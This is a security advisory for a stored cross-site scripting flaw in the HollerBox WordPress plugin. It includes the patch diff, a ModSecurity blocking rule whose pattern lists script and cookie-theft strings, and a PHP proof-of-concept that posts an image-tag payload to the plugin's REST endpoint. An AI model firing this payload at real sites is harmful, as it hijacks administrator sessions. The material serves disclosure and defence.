Atomic Edge analysis of CVE-2026-48885:
This vulnerability allows unauthenticated stored cross-site scripting (XSS) in the HollerBox plugin for WordPress, versions up to and including 2.3.10.1. The plugin fails to properly sanitize and escape the ‘location’ parameter in its REST API endpoints. An attacker can inject arbitrary JavaScript into the plugin’s reporting database, which executes when an administrator views the popup analytics dashboard. The CVSS score is 7.2.
The root cause lies in two REST API callback functions within /holler-box/includes/class-holler-api.php: the conversion tracking endpoint and the impression tracking endpoint. Both use sanitize_text_field() on the ‘location’ parameter before passing it to parse_url(). The sanitize_text_field() function removes some HTML tags but does not prevent JavaScript injection via encoded payloads or event handlers. Crucially, the plugin then stores this sanitized-but-not-escaped location value into the database via Holler_Reporting::add_conversion() and Holler_Reporting::add_impression(). Later, when the data is displayed in the WordPress admin dashboard, there is no output escaping, allowing the stored XSS to execute.
Exploitation requires no authentication. An attacker sends a POST request to the WordPress REST API endpoint /wp-json/hollerbox/v1/conversion or /wp-json/hollerbox/v1/impression. The attacker includes a ‘location’ parameter containing an XSS payload, such as a JavaScript URI or an HTML string with an onerror event handler. The ‘popup_id’ parameter must reference a valid popup, but attackers can enumerate popup IDs or use existing ones from site scraping. The server stores the malicious payload. When an administrator accesses the HollerBox analytics page (e.g., /wp-admin/admin.php?page=hollerbox-reporting), the script executes in their browser session.
The patch changes the input handling in both GET endpoints. Specifically, line 205 changes sanitize_text_field( $request->get_param( ‘location’ ) ) to esc_url_raw( $request->get_param( ‘location’ ) ). Line 239 makes the same change. The esc_url_raw() function strips all non-URL characters, including HTML tags and JavaScript URI schemes. This prevents any XSS payload from being stored. Additionally, the patch adds an existence check to the popup object constructor in /holler-box/includes/class-holler-popup.php, preventing operations on non-existent popups.
If exploited, this vulnerability allows unauthenticated attackers to execute arbitrary JavaScript in the context of a logged-in administrator’s WordPress session. This can lead to privilege escalation (creating new admin accounts), data exfiltration of sensitive information (user lists, WooCommerce orders), installation of backdoors, or complete site compromise. The attacker does not need any prior access or special privileges, making this a critical risk for any site running the vulnerable plugin.
Below is a differential between the unpatched vulnerable code and the patched update, for reference.
--- a/holler-box/holler-box.php
+++ b/holler-box/holler-box.php
@@ -3,7 +3,7 @@
* Plugin Name: HollerBox
* Plugin URI: https://hollerwp.com
* Description: Powerful Popups & Lead Generation for Small Businesses & Agencies using WordPress
- * Version: 2.3.10.1
+ * Version: 2.3.11
* Author: Groundhogg Inc.
* Author URI: https://groundhogg.io
* Text Domain: holler-box
@@ -19,7 +19,7 @@
exit;
}
-define( 'HOLLERBOX_VERSION', '2.3.10.1' );
+define( 'HOLLERBOX_VERSION', '2.3.11' );
if ( ! class_exists( 'Holler_Box' ) ) {
--- a/holler-box/includes/class-holler-api.php
+++ b/holler-box/includes/class-holler-api.php
@@ -202,7 +202,7 @@
}
// Parse the location
- $location = parse_url( sanitize_text_field( $request->get_param( 'location' ) ), PHP_URL_PATH );
+ $location = parse_url( esc_url_raw( $request->get_param( 'location' ) ), PHP_URL_PATH );
$content = sanitize_text_field( $request->get_param( 'content' ) );
Holler_Reporting::instance()->add_conversion( $popup, $location, $content );
@@ -236,7 +236,7 @@
}
// Parse the location
- $location = parse_url( sanitize_text_field( $request->get_param( 'location' ) ), PHP_URL_PATH );
+ $location = parse_url( esc_url_raw( $request->get_param( 'location' ) ), PHP_URL_PATH );
Holler_Reporting::instance()->add_impression( $popup, $location );
--- a/holler-box/includes/class-holler-popup.php
+++ b/holler-box/includes/class-holler-popup.php
@@ -50,6 +50,11 @@
$this->setup( $id );
+ // make sure the post exists before continuing...
+ if ( ! $this->exists() ){
+ return;
+ }
+
// Upgrades
$this->maybe_upgrade_2_0();
$this->maybe_upgrade_2_0_integrations();
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-48885
# Block unauthenticated stored XSS via the location parameter in HollerBox REST API endpoints
SecRule REQUEST_URI "@rx ^/wp-json/hollerbox/v1/(conversion|impression)$"
"id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2026-48885 - HollerBox Stored XSS via REST API',severity:'CRITICAL',tag:'CVE-2026-48885'"
SecRule ARGS_POST:location "@rx (?i)(<script|javascript:|onw+s*=|alert(|confirm(|prompt(|eval(|fromCharCode|document.cookie|document.location|window.location)"
"t:lowercase,t:urlDecode,t:removeNulls"
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-48885 - HollerBox - Unauthenticated Stored Cross-Site Scripting
define('TARGET_URL', 'http://example.com');
define('POPUP_ID', 1); // Replace with a valid popup ID on the target
// Step 1: Test if the REST API endpoint is accessible without authentication
$test_url = TARGET_URL . '/wp-json/hollerbox/v1/conversion';
// Step 2: Craft the XSS payload
$js_payload = '" onmouseover="alert(document.cookie)" ';
$wrapped_payload = '<img src=x ' . $js_payload . '>';
// Step 3: Prepare POST data
$post_data = array(
'popup_id' => POPUP_ID,
'location' => '/test-page' . $wrapped_payload
);
// Step 4: Initialize cURL and execute the request
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $test_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'Content-Type: application/x-www-form-urlencoded',
'User-Agent: AtomicEdge-PoC'
));
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
// Step 5: Verify the result
if ($http_code == 200) {
echo "[+] XSS payload stored successfully.n";
echo "[+] Trigger: Visit /wp-admin/admin.php?page=hollerbox-reporting as admin.n";
echo "[+] Payload used: " . $wrapped_payload . "n";
} else {
echo "[-] Failed to store payload. HTTP code: " . $http_code . "n";
exit(1);
}
